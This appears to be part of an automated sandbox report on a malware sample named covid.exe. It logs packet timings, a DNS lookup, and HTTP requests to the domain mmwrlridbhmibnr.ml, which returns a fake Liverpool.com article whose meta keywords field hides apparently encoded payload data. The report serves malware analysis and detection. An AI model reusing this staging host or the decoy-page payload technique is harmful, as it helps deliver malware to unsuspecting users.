                                                                Apr 20, 2021 22:59:14.580359936 CEST4970280192.168.2.7172.67.220.147
                                                                Apr 20, 2021 22:59:14.580374956 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:14.580398083 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:14.580398083 CEST4970280192.168.2.7172.67.220.147
                                                                Apr 20, 2021 22:59:14.580425024 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:14.580439091 CEST4970280192.168.2.7172.67.220.147
                                                                Apr 20, 2021 22:59:14.580451012 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:14.580476999 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:14.580492020 CEST4970280192.168.2.7172.67.220.147
                                                                Apr 20, 2021 22:59:14.580499887 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:14.580526114 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:14.580540895 CEST4970280192.168.2.7172.67.220.147
                                                                Apr 20, 2021 22:59:14.580549002 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:14.580574989 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:14.580593109 CEST4970280192.168.2.7172.67.220.147
                                                                Apr 20, 2021 22:59:14.580598116 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:14.580625057 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:14.580640078 CEST4970280192.168.2.7172.67.220.147
                                                                Apr 20, 2021 22:59:14.580647945 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:14.580671072 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:14.580689907 CEST4970280192.168.2.7172.67.220.147
                                                                Apr 20, 2021 22:59:14.580696106 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:14.580718994 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:14.580735922 CEST4970280192.168.2.7172.67.220.147
                                                                Apr 20, 2021 22:59:14.580741882 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:14.580765963 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:14.580776930 CEST4970280192.168.2.7172.67.220.147
                                                                Apr 20, 2021 22:59:14.581350088 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:14.581394911 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:14.581413984 CEST4970280192.168.2.7172.67.220.147
                                                                Apr 20, 2021 22:59:14.581422091 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:14.581448078 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:14.581469059 CEST4970280192.168.2.7172.67.220.147
                                                                Apr 20, 2021 22:59:14.581471920 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:14.581499100 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:14.581516981 CEST4970280192.168.2.7172.67.220.147
                                                                Apr 20, 2021 22:59:14.581525087 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:14.581548929 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:14.581566095 CEST4970280192.168.2.7172.67.220.147
                                                                Apr 20, 2021 22:59:14.581573009 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:14.581602097 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:14.581612110 CEST4970280192.168.2.7172.67.220.147
                                                                Apr 20, 2021 22:59:14.581625938 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:14.581649065 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:14.581671000 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:14.581671953 CEST4970280192.168.2.7172.67.220.147
                                                                Apr 20, 2021 22:59:14.581693888 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:14.581715107 CEST4970280192.168.2.7172.67.220.147
                                                                Apr 20, 2021 22:59:14.581718922 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:14.581743956 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:14.581760883 CEST4970280192.168.2.7172.67.220.147
                                                                Apr 20, 2021 22:59:14.581767082 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:14.581795931 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:14.581818104 CEST4970280192.168.2.7172.67.220.147
                                                                Apr 20, 2021 22:59:14.581819057 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:14.581845045 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:14.581862926 CEST4970280192.168.2.7172.67.220.147
                                                                Apr 20, 2021 22:59:14.581871033 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:14.581912041 CEST4970280192.168.2.7172.67.220.147
                                                                Apr 20, 2021 22:59:14.582200050 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:14.582226038 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:14.582251072 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:14.582272053 CEST4970280192.168.2.7172.67.220.147
                                                                Apr 20, 2021 22:59:14.582276106 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:14.582302094 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:14.582321882 CEST4970280192.168.2.7172.67.220.147
                                                                Apr 20, 2021 22:59:14.582325935 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:14.582350016 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:14.582366943 CEST4970280192.168.2.7172.67.220.147
                                                                Apr 20, 2021 22:59:14.582376003 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:14.582403898 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:14.582422972 CEST4970280192.168.2.7172.67.220.147
                                                                Apr 20, 2021 22:59:14.582428932 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:14.582453012 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:14.582472086 CEST4970280192.168.2.7172.67.220.147
                                                                Apr 20, 2021 22:59:14.582475901 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:14.582501888 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:14.582519054 CEST4970280192.168.2.7172.67.220.147
                                                                Apr 20, 2021 22:59:14.582525969 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:14.582551003 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:14.582564116 CEST4970280192.168.2.7172.67.220.147
                                                                Apr 20, 2021 22:59:14.582572937 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:14.582602024 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:14.582612038 CEST4970280192.168.2.7172.67.220.147
                                                                Apr 20, 2021 22:59:14.582627058 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:14.582648993 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:14.582669973 CEST4970280192.168.2.7172.67.220.147
                                                                Apr 20, 2021 22:59:14.582670927 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:14.582695007 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:14.582714081 CEST4970280192.168.2.7172.67.220.147
                                                                Apr 20, 2021 22:59:14.583154917 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:14.583188057 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:14.583214045 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:14.583225012 CEST4970280192.168.2.7172.67.220.147
                                                                Apr 20, 2021 22:59:14.583235979 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:14.583259106 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:14.583262920 CEST4970280192.168.2.7172.67.220.147
                                                                Apr 20, 2021 22:59:14.583283901 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:14.583343983 CEST4970280192.168.2.7172.67.220.147
                                                                Apr 20, 2021 22:59:14.583410978 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:14.583440065 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:14.583462000 CEST4970280192.168.2.7172.67.220.147
                                                                Apr 20, 2021 22:59:14.583482027 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:14.583508015 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:14.583527088 CEST4970280192.168.2.7172.67.220.147
                                                                Apr 20, 2021 22:59:14.583532095 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:14.583559036 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:14.583581924 CEST4970280192.168.2.7172.67.220.147
                                                                Apr 20, 2021 22:59:14.583585978 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:14.583614111 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:14.583625078 CEST4970280192.168.2.7172.67.220.147
                                                                Apr 20, 2021 22:59:14.583640099 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:14.583662987 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:14.583705902 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:14.583728075 CEST4970280192.168.2.7172.67.220.147
                                                                Apr 20, 2021 22:59:14.583730936 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:14.583745956 CEST4970280192.168.2.7172.67.220.147
                                                                Apr 20, 2021 22:59:14.583755970 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:14.583779097 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:14.583802938 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:14.583803892 CEST4970280192.168.2.7172.67.220.147
                                                                Apr 20, 2021 22:59:14.583827972 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:14.583848953 CEST4970280192.168.2.7172.67.220.147
                                                                Apr 20, 2021 22:59:14.583851099 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:14.583875895 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:14.583893061 CEST4970280192.168.2.7172.67.220.147
                                                                Apr 20, 2021 22:59:14.583901882 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:14.583929062 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:14.583947897 CEST4970280192.168.2.7172.67.220.147
                                                                Apr 20, 2021 22:59:14.583955050 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:14.583992004 CEST4970280192.168.2.7172.67.220.147
                                                                Apr 20, 2021 22:59:14.584403992 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:14.584537029 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:14.584572077 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:14.584583998 CEST4970280192.168.2.7172.67.220.147
                                                                Apr 20, 2021 22:59:14.584599018 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:14.584630966 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:14.584649086 CEST4970280192.168.2.7172.67.220.147
                                                                Apr 20, 2021 22:59:14.584650993 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:14.584675074 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:14.584693909 CEST4970280192.168.2.7172.67.220.147
                                                                Apr 20, 2021 22:59:14.584697008 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:14.584714890 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:14.584731102 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:14.584748030 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:14.584748030 CEST4970280192.168.2.7172.67.220.147
                                                                Apr 20, 2021 22:59:14.584765911 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:14.584783077 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:14.584784985 CEST4970280192.168.2.7172.67.220.147
                                                                Apr 20, 2021 22:59:14.584800959 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:14.584822893 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:14.584824085 CEST4970280192.168.2.7172.67.220.147
                                                                Apr 20, 2021 22:59:14.584842920 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:14.584851027 CEST4970280192.168.2.7172.67.220.147
                                                                Apr 20, 2021 22:59:14.584861040 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:14.584878922 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:14.584884882 CEST4970280192.168.2.7172.67.220.147
                                                                Apr 20, 2021 22:59:14.584896088 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:14.584913015 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:14.584929943 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:14.584939957 CEST4970280192.168.2.7172.67.220.147
                                                                Apr 20, 2021 22:59:14.584983110 CEST4970280192.168.2.7172.67.220.147
                                                                Apr 20, 2021 22:59:14.585344076 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:14.585369110 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:14.585410118 CEST8049702172.67.220.147192.168.2.7
                                                                Apr 20, 2021 22:59:14.585432053 CEST4970280192.168.2.7172.67.220.147

UDP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP

                                                                DNS Queries

                                                                 Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
                                                                 Apr 20, 2021 22:59:11.542737961 CEST | 192.168.2.7 | 8.8.8.8 | 0xd719 | Standard query (0) | mmwrlridbhmibnr.ml | A (IP address) | IN (0x0001)

                                                                DNS Answers

                                                                 Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
                                                                 Apr 20, 2021 22:59:11.605129004 CEST | 8.8.8.8 | 192.168.2.7 | 0xd719 | No error (0) | mmwrlridbhmibnr.ml | - | 172.67.220.147 | A (IP address) | IN (0x0001)
                                                                 Apr 20, 2021 22:59:11.605129004 CEST | 8.8.8.8 | 192.168.2.7 | 0xd719 | No error (0) | mmwrlridbhmibnr.ml | - | 104.21.86.143 | A (IP address) | IN (0x0001)

                                                                HTTP Request Dependency Graph

                                                                • mmwrlridbhmibnr.ml

                                                                HTTP Packets

                                                                 Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                 0 | 192.168.2.7 | 49702 | 172.67.220.147 | 80 | C:\Users\user\Desktop\covid.exe
                                                                 Timestamp | kBytes transferred | Direction | Data
                                                                 Apr 20, 2021 22:59:11.684930086 CEST | 532 | OUT | GET /liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-A70E3BA9C56C3F44E5DAA4E51EAD00CB.html HTTP/1.1
                                                                UserAgent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.106 Safari/537.36 OPR/38.0.2220.41
                                                                Host: mmwrlridbhmibnr.ml
                                                                Connection: Keep-Alive
                                                                 Apr 20, 2021 22:59:11.937634945 CEST | 534 | IN | HTTP/1.1 200 OK
                                                                Date: Tue, 20 Apr 2021 20:59:11 GMT
                                                                Content-Type: text/html
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Set-Cookie: __cfduid=def339989e5b144f74108a03997626ea81618952351; expires=Thu, 20-May-21 20:59:11 GMT; path=/; domain=.mmwrlridbhmibnr.ml; HttpOnly; SameSite=Lax
                                                                Last-Modified: Mon, 19 Apr 2021 16:43:45 GMT
                                                                Vary: Accept-Encoding
                                                                X-Frame-Options: SAMEORIGIN
                                                                CF-Cache-Status: DYNAMIC
                                                                cf-request-id: 0992ad87ea00004c61831a9000000001
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=SojOEnCzNZOcpPH9V09NVNMKi30bi5e6KyB4nFY2c8aLPsTGisEWiLNZoO29IbkhzyrdYcOM7hA4Ek3c%2Bd4pVRadrnwGEJy3dL9c0PXzBSaGYu4%3D"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"max_age":604800,"report_to":"cf-nel"}
                                                                Server: cloudflare
                                                                CF-RAY: 64314b864a8a4c61-AMS
                                                                alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                Data Raw: 31 64 33 64 0d 0a 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 21 2d 2d 0d 0a 70 61 67 65 20 67 65 6e 65 72 61 74 65 64 20 61 74 3a 20 54 68 75 20 4d 61 72 20 30 34 20 31 36 3a 32 30 3a 30 32 20 47 4d 54 20 32 30 32 31 0d 0a 70 61 67 65 20 67 65 6e 65 72 61 74 65 64 20 62 79 20 65 73 63 65 6e 69 63 2e 73 65 72 76 65 72 2f 68 6f 73 74 6e 61 6d 65 3a 20 72 65 67 2d 70 72 65 73 32 30 36 2e 74 6d 2d 61 77 73 2e 63 6f 6d 2f 72 65 67 2d 70 72 65 73 32 30 36 2e 74 6d 2d 61 77 73 2e 63 6f 6d 0d 0a 70 61 67 65 20 67 65 6e 65 72 61 74 65 64 20 69 6e 20 73 65 63 74 69 6f 6e 3a 20 33 30 39 38 34 37 37 0d 0a 2d 2d 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 64 6e 73 2d 70 72 65 66 65 74 63 68 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 32 2d 70 72 6f 64 2e 6c 69 76 65 72 70 6f 6f 6c 2e 63 6f 6d 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 32 2d 70 72 6f 64 2e 6c 69 76 65 72 70 6f 6f 6c 2e 63 6f 6d 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 64 6e 73 2d 70 72 65 66 65 74 63 68 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 69 32 2d 70 72 6f 64 2e 6c 69 76 65 72 70 6f 6f 6c 2e 63 6f 6d 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 69 32 2d 70
                                                                Data Ascii: 1d3d<!DOCTYPE html><html lang="en">...page generated at: Thu Mar 04 16:20:02 GMT 2021page generated by escenic.server/hostname: reg-pres206.tm-aws.com/reg-pres206.tm-aws.compage generated in section: 3098477--><head><link rel="dns-prefetch" href="https://s2-prod.liverpool.com"><link rel="preconnect" href="https://s2-prod.liverpool.com"><link rel="dns-prefetch" href="https://i2-prod.liverpool.com"><link rel="preconnect" href="https://i2-p
                                                                 Apr 20, 2021 22:59:11.937678099 CEST | 535 | IN | Data Raw: 72 6f 64 2e 6c 69 76 65 72 70 6f 6f 6c 2e 63 6f 6d 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 64 6e 73 2d 70 72 65 66 65 74 63 68 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 65 6c 69 78 2e 64 61 74 61 2e 74 6d 2d 61 77 78 2e 63 6f 6d 22 3e 3c
                                                                Data Ascii: rod.liverpool.com"><link rel="dns-prefetch" href="https://felix.data.tm-awx.com"><link rel="preconnect" href="https://felix.data.tm-awx.com"><link rel="dns-prefetch" href="https://www.googletagmanager.com"><link rel="preconnect" href="https://
                                                                 Apr 20, 2021 22:59:11.937705040 CEST | 537 | IN | Data Raw: 69 6f 6e 73 2f 6c 69 76 65 72 70 6f 6f 6c 2f 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 6c 6f 61 64 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 32 2d 70 72 6f 64 2e 6c 69 76 65 72 70 6f 6f 6c 2e 63 6f 6d 2f 40 74 72 69 6e 69 74 79 6d
                                                                Data Ascii: ions/liverpool/"><link rel="preload" href="https://s2-prod.liverpool.com/@trinitymirrordigital/chameleon-branding/webfonts/woff2/SignikaNegative-Bold.47b398e81c9f2e2e.woff2" as="font" crossorigin="crossorigin"><link rel="preload" href="https:/
                                                                 Apr 20, 2021 22:59:11.937730074 CEST | 538 | IN | Data Raw: 6e 65 73 2d 61 70 70 22 20 63 6f 6e 74 65 6e 74 3d 22 61 70 70 2d 69 64 3d 75 6e 64 65 66 69 6e 65 64 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 32 2d 70 72 6f 64
                                                                Data Ascii: nes-app" content="app-id=undefined"><link rel="stylesheet" href="https://s2-prod.liverpool.com/@trinitymirrordigital/article-service/read-next/scss/read-next.css?v=b790533e8e5a70ffa0c2c6c8d118c407"><script type="text/javascript">/*!* $sc
                                                                 Apr 20, 2021 22:59:11.937752008 CEST | 539 | IN | Data Raw: 2e 6c 61 73 74 43 68 69 6c 64 29 7d 76 61 72 20 65 3d 64 6f 63 75 6d 65 6e 74 2c 74 3d 65 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 22 68 65 61 64 22 29 5b 30 5d 2c 6e 3d 22 73 74 72 69 6e 67 22 2c 72 3d 21 31 2c 69 3d 22
                                                                Data Ascii: .lastChild)}var e=document,t=e.getElementsByTagName("head")[0],n="string",r=!1,i="push",s="readyState",o="onreadystatechange",u={},a={},f={},l={},c,h;return v.get=m,v.order=function(e,t,n){(function r(i){i=e.shift(),e.length?v(i,r):v(i,t,n)})(
                                                                 Apr 20, 2021 22:59:11.937773943 CEST | 541 | IN | Data Raw: 63 65 4d 61 70 70 69 6e 67 55 52 4c 3d 63 73 73 6c 6f 61 64 65 72 2e 6d 69 6e 2e 6a 73 2e 6d 61 70 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 64 61 74 61 4c 61 79 65 72 20 3d 20 5b 5d 3b 0d 0a 3c 2f 73 63 72 69
                                                                Data Ascii: ceMappingURL=cssloader.min.js.map</script><script>window.dataLayer = [];</script><script>(function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({"gtm.start":new Date().getTime(),event:"gtm.js"});var f=d.getElementsByTagName(s)[0],j=d.createEleme
                                                                 Apr 20, 2021 22:59:11.937797070 CEST | 541 | IN | Data Raw: 6f 75 74 20 74 6f 20 63 68 61 6e 67 65 20 2d 20 4c 69 76 65 72 70 6f 6f 6c 2e 63 6f 6d 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d
                                                                Data Ascii: out to change - Liverpool.com</title><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><meta name="description" content="Rhian Brewster was hyped up b
                                                                 Apr 20, 2021 22:59:12.198029995 CEST | 548 | IN | Data Raw: 37 66 66 39 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 53 53 20 4f 66 20 79 51 51 20 66 20 46 20 66 20 66 20 66 20 51 20 66 20 66 20 66 20 65 78 78 20 65 78 78 20 66 20 66 20 79 43 51 20 66
                                                                Data Ascii: 7ff9<meta name="keywords" content="SS Of yQQ f F f f f Q f f f exx exx f f yCQ f f f f f f f wQ f f f f f f f f f f f f f f f f f f f f f f f f f f f f f f f f f f f yeC f f f yQ Fy yCw yQ f yCf O efx FF yCQ y Sw efx FF CQ yfQ yfx yyx Fe yye
                                                                 Apr 20, 2021 22:59:12.198069096 CEST | 549 | IN | Data Raw: 4f 51 20 46 20 66 20 66 20 66 20 66 20 66 20 66 20 66 20 66 20 66 20 66 20 66 20 66 20 66 20 66 20 66 20 66 20 66 20 66 20 66 20 66 20 66 20 66 20 66 20 66 20 66 20 66 20 66 20 66 20 66 20 66 20 66 20 66 20 66 20 66 20 66 20 66 20 66 20 66 20 66
                                                                Data Ascii: OQ F f f f f f f f f f f f f f f f f f f f f f f f f f f f f f f f f f f f f f f f f f ew Qf yF f f w Qe Qe exQ O f f Qf yyf f f yf Qe Ff e Qf yeC f f yf Qe FC f e Qf yeO f f yf f Qe yww yyx yFf f f yf yeC Q f f Q yyx yFy f f yf yeC x f f Q yy
                                                                 Apr 20, 2021 22:59:12.198093891 CEST | 550 | IN | Data Raw: 20 79 51 20 46 20 66 20 65 78 51 20 79 46 20 46 20 66 20 65 78 51 20 65 65 20 46 46 20 66 20 66 20 79 20 79 79 79 20 79 46 20 66 20 66 20 79 66 20 51 66 20 79 77 20 66 20 66 20 79 66 20 65 78 51 20 79 51 20 65 20 66 20 65 78 51 20 79 65 20 65 20
                                                                Data Ascii: yQ F f exQ yF F f exQ ee FF f f y yyy yF f f yf Qf yw f f yf exQ yQ e f exQ ye e f Qf yS f f yf FC yyQ yQ yCf F yye exQ ye e f exQ ye y f Qf yw f f yf Qf e f f w Qf yC f f yf f f yyx yO f f yf exQ yQ Q f exQ ye Q f yyy ef f f yf yyQ yQ yCf F
                                                                 Apr 20, 2021 22:59:12.198117971 CEST | 552 | IN | Data Raw: 79 66 20 4f 77 20 65 78 51 20 79 51 20 66 20 66 20 78 77 20 43 20 66 20 66 20 66 20 51 46 20 77 20 65 78 51 20 65 65 20 78 65 20 66 20 66 20 79 20 65 78 51 20 79 65 20 66 20 66 20 51 65 20 66 20 79 4f 20 51 43 20 79 79 20 66 20 51 43 20 66 20 66
                                                                Data Ascii: yf Ow exQ yQ f f xw C f f f QF w exQ ee xe f f y exQ ye f f Qe f yO QC yy f QC f f f F f f yS yQf Ff f f y f Qf FQ f f yf yyx FC f f yf Fe Fe e f f yyy FO f f yf exQ yQ f f xw C f f f QF w exQ ee xw f f y exQ ye f f Qe eS QC yy f yyF y f f Q f
                                                                 Apr 20, 2021 22:59:14.111917019 CEST | 1897 | OUT | GET /liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-8D0E09CE9EC742EC93B6C666F9ACD863.html HTTP/1.1
                                                                UserAgent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.106 Safari/537.36 OPR/38.0.2220.41
                                                                Host: mmwrlridbhmibnr.ml
                                                                 Apr 20, 2021 22:59:14.335450888 CEST | 1899 | IN | HTTP/1.1 200 OK
                                                                Date: Tue, 20 Apr 2021 20:59:14 GMT
                                                                Content-Type: text/html
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Set-Cookie: __cfduid=d42fb9142b77b1729aa1493c5d642785b1618952354; expires=Thu, 20-May-21 20:59:14 GMT; path=/; domain=.mmwrlridbhmibnr.ml; HttpOnly; SameSite=Lax
                                                                Last-Modified: Mon, 19 Apr 2021 16:43:47 GMT
                                                                Vary: Accept-Encoding
                                                                X-Frame-Options: SAMEORIGIN
                                                                CF-Cache-Status: DYNAMIC
                                                                cf-request-id: 0992ad916500004c61b3360000000001
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=HYSCakQjfwectyu0TrGfii9TUdtoyg%2BiZr73ZnJbZjdPnW7Wzs%2BD%2Bo1IU7nTZp5FGx3vulWIlq3AYfw%2F8WfXWKOU9PPB8oQHT6jqOrfg%2FF0zkOU%3D"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"max_age":604800,"report_to":"cf-nel"}
                                                                Server: cloudflare
                                                                CF-RAY: 64314b956d844c61-AMS
                                                                alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
